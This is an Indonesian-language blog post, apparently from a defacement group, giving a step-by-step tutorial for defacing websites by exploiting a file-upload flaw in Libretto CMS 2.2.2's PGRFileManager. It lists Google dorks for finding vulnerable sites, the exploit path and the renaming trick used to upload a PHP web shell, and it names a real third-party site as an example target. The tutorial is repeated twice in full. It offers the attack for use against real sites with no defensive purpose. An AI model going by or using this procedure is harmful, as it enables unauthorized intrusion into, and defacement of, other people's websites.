| Filename | Deface dengan teknik Exploit Libretto CMS 2.2.2 Malicious File Upload |
| Permission | rw-r--r-- |
| Author | Fahmi J |
| Date and Time | 00.02 |
| Label | CMS| Defacing| File Manager| File Upload |
| Action |
Oke langsung saja :
Bahan :
Shell php yang telah direname menjadi shell.doc
Dork :
inurl:js/ckeditor/plugins/pgrfilemanager
inurl:pgrfileManager.php
intitle:PGRFileManager v
atau apapun yg berkaitan sama PGRFileManager.php
Exploit :
http://target/librettoCMS/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
Step by Step :
Mulai berselancar di google. Cari target yang sabar. Misalnya saya pilih
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/css/le-frog/
Ubah menjadi
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
Upload shell yang telah direname menjadi shell.doc.
Lihat gambar :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLN_7yYYHnYpTlLUPEZze6XrWd4zRsPXqqcyUoLqp6Fgns4Hyw5s3tv-nrmc8OCRDpUpZJSGzfepi8aojhe4GPLLfs8obwFZ8CvJl9l9DhYl7WOM9hG4AeG2YoUl00cvaJ06GXXoQOdNlG/s320/step1.png
Setelah upload berhasil, rename shellnya menjadi shell.php
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHU6V7wu_SfBZOkd0kS1k2FXSjmg01bsyP9KRxupITCUxd9XnbhPOPXjzNJJFghwzjuG9AZYFl1dmGjxA3O2JlhjUMc1PHzWNe6CfcP93mCK1JOboTsrzbGlpopv1MDm6B76rJo8JcNpA/s320/step2.png
Akses shellnya di site/assets/user/shell.php
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_UvHw3bkHJncbeDN6tD7xTKoB7-I8Y2Tn3q_zBW-h_DfC8xxBxUs61edL5p6Q8_5Bax5v_CpIpEpdvrI-bLsFrZPN57MMqvefhiBHhmfuRKlhMAZLde-4oLomala9EDOnA6bZMYchrq8/s320/step3.png
Hajar index. :)
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1ErYDCwsh4h5WezyuTcjdKT4Y-gVuOTpScqpCpqQ9oLoaTNysjm9xccXef17tgcvnEbM9PZz8i5mn8JbJNME4s9Peq-_EcKfGqCX214quutETpZ-_-7TRU5MkxiqnNLIilvwnNouNt1x/s320/done.png
Sekian Tutor ini cukup mudah tapi.. sulit mencari tempat akses shell setiap site berbeda beda jadi keep trying gan :D
Sumber : Madura Cyber
Bahan :
Shell php yang telah direname menjadi shell.doc
Dork :
inurl:js/ckeditor/plugins/pgrfilemanager
inurl:pgrfileManager.php
intitle:PGRFileManager v
atau apapun yg berkaitan sama PGRFileManager.php
Exploit :
http://target/librettoCMS/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
Step by Step :
Mulai berselancar di google. Cari target yang sabar. Misalnya saya pilih
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/css/le-frog/
Ubah menjadi
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
Upload shell yang telah direname menjadi shell.doc.
Lihat gambar :
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLN_7yYYHnYpTlLUPEZze6XrWd4zRsPXqqcyUoLqp6Fgns4Hyw5s3tv-nrmc8OCRDpUpZJSGzfepi8aojhe4GPLLfs8obwFZ8CvJl9l9DhYl7WOM9hG4AeG2YoUl00cvaJ06GXXoQOdNlG/s320/step1.png
Setelah upload berhasil, rename shellnya menjadi shell.php
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHU6V7wu_SfBZOkd0kS1k2FXSjmg01bsyP9KRxupITCUxd9XnbhPOPXjzNJJFghwzjuG9AZYFl1dmGjxA3O2JlhjUMc1PHzWNe6CfcP93mCK1JOboTsrzbGlpopv1MDm6B76rJo8JcNpA/s320/step2.png
Akses shellnya di site/assets/user/shell.php
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_UvHw3bkHJncbeDN6tD7xTKoB7-I8Y2Tn3q_zBW-h_DfC8xxBxUs61edL5p6Q8_5Bax5v_CpIpEpdvrI-bLsFrZPN57MMqvefhiBHhmfuRKlhMAZLde-4oLomala9EDOnA6bZMYchrq8/s320/step3.png
Hajar index. :)
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1ErYDCwsh4h5WezyuTcjdKT4Y-gVuOTpScqpCpqQ9oLoaTNysjm9xccXef17tgcvnEbM9PZz8i5mn8JbJNME4s9Peq-_EcKfGqCX214quutETpZ-_-7TRU5MkxiqnNLIilvwnNouNt1x/s320/done.png
Sekian Tutor ini cukup mudah tapi.. sulit mencari tempat akses shell setiap site berbeda beda jadi keep trying gan :D
Sumber : Madura Cyber
0 komentar:
Posting Komentar